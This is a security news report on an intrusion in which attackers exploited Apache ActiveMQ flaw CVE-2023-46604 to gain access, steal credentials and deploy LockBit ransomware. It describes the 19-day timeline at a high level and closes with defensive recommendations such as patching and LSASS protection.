A significant security breach has occurred involving a vulnerability in Apache ActiveMQ, leading to a widespread deployment of LockBit ransomware on an enterprise network. This critical flaw, identified as CVE-2023-46604, permits remote code execution, which attackers exploited to gain access to an unprotected Windows server.
Exploitation of Apache ActiveMQ Vulnerability
The breach commenced in mid-February 2024, when malicious actors utilized the Apache ActiveMQ vulnerability to send a crafted OpenWire command to the publicly accessible server. This exploit prompted the server to load a remote Java Spring XML configuration file, instructing the compromised system to download a Metasploit stager via the Windows CertUtil tool. The stager then established a command-and-control connection to a server controlled by the attackers, rapidly escalating to SYSTEM-level privileges and extracting credentials from LSASS process memory.
Despite initial efforts to remove the attackers, the vulnerability remained unpatched, allowing them to return 18 days later. The attackers re-entered the network by exploiting the same vulnerability, only altering file names. A privileged service account, whose credentials were stolen during the first intrusion, facilitated their re-entry into the system.
Advanced Attack Techniques and Impact
Upon re-entry, attackers confirmed domain administrator access and used a disguised network scanning tool to identify active hosts. They deployed LockBit ransomware executables across servers and workstations via Remote Desktop Protocol (RDP) sessions. The ransomware was executed using specific commands on file servers, while simple execution was used on other machines. The attackers left ransom notes directing victims to the Session private messaging app, indicating a deviation from official LockBit channels.
The overall duration from initial breach to full encryption was 419 hours, or just over 19 days. Early detection of the intrusion was crucial, as the attackers would have required less than 90 minutes to initiate the ransomware execution upon re-entry.
Credential Theft and Defensive Measures
The initial breach involved accessing LSASS memory on several hosts, which was captured in Sysmon logs. This credential theft enabled lateral movement within the network and provided a pathway for the second intrusion. The attackers employed obfuscation techniques for PowerShell commands, using string concatenation and encoding to evade detection. On hosts with active Microsoft Defender, these activities were intercepted and blocked, though unprotected systems were compromised.
To maintain access, the attackers installed AnyDesk silently on the compromised host, configured for auto-start. A batch file manipulated firewall settings to open RDP connections, which were removed shortly after execution. System logs were cleared to conceal their presence, and Windows Defender was disabled on the Exchange server using a legitimate executable.
Security experts advise organizations to promptly patch Apache ActiveMQ to mitigate CVE-2023-46604. Additional recommendations include enforcing LSASS protection, monitoring for log clearing activities, restricting unauthorized remote tool installations, and resetting credentials post-intrusion to prevent further breaches.
